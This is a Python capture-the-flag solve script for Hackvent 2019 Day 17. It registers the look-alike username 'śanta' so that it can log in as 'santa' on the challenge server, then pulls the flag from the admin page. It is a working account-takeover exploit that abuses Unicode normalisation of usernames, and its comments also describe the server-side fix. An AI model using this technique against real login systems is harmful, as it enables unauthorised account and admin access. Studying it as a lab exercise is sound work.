Hackvent_2019/Day 17/exploit.py


#!/usr/bin/python
import requests
import random
import string
import re
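BASE_URL = "http://whale.hacking-lab.com:8881"
# Throwaway password for the account registered below. `random` is not a
# CSPRNG and the value is sent over plain HTTP, so never reuse a real secret.
PASSWORD = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
SESSION = requests.session()
# Raw string: "\{" and "\}" are invalid escapes in an ordinary string literal
# and trigger a warning on current Python versions.
FLAG_PATTERN = re.compile(r"HV19\{[^}]*\}")
# Seconds to wait per request; without a timeout `requests` can block forever.
TIMEOUT = 10
# Error text the script looks for to detect a rejected login.
LOGIN_ERROR = "username not found or wrong password!"


def _abort(response, show_body=True):
    """Print the HTTP status (and optionally the body), then exit with status 1."""
    print("Server returned: %d %s" % (response.status_code, response.reason))
    if show_body:
        print(response.text)
    # SystemExit is what the site-provided exit() raises; raising it directly
    # also works when the interpreter runs without the `site` module.
    raise SystemExit(1)


# 1. Register the look-alike name "śanta" (U+015B, s with acute), not "santa".
# NOTE(review): step 2 logs in as plain "santa" with the same password, so the
# server presumably folds the two names onto one account -- not visible from
# the client side. The server-side fix for that class of bug is to canonicalise
# usernames once, before the uniqueness check, and store only that form.
res = SESSION.post(
    BASE_URL + "/register.php",
    data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD},
    timeout=TIMEOUT,
)
if res.status_code != 200 or "Registration successful!" not in res.text:
    _abort(res)

# 2. Log in as "santa" with the password chosen at registration.
res = SESSION.post(
    BASE_URL + "/login.php",
    data={"username": "santa", "pwd": PASSWORD},
    timeout=TIMEOUT,
)
if res.status_code != 200 or LOGIN_ERROR in res.text:
    _abort(res)

# 3. Fetch the admin page with the session cookies obtained in step 2.
res = SESSION.get(BASE_URL + "/admin.php", timeout=TIMEOUT)
if res.status_code != 200 or LOGIN_ERROR in res.text:
    # As in the original, the body is not echoed for this step.
    _abort(res, show_body=False)

# Print the matched flag text rather than the repr of the Match object, and
# report a miss explicitly instead of printing "None" with exit status 0.
flag = FLAG_PATTERN.search(res.text)
if flag is None:
    print("No flag found in the /admin.php response")
    raise SystemExit(1)
print(flag.group(0))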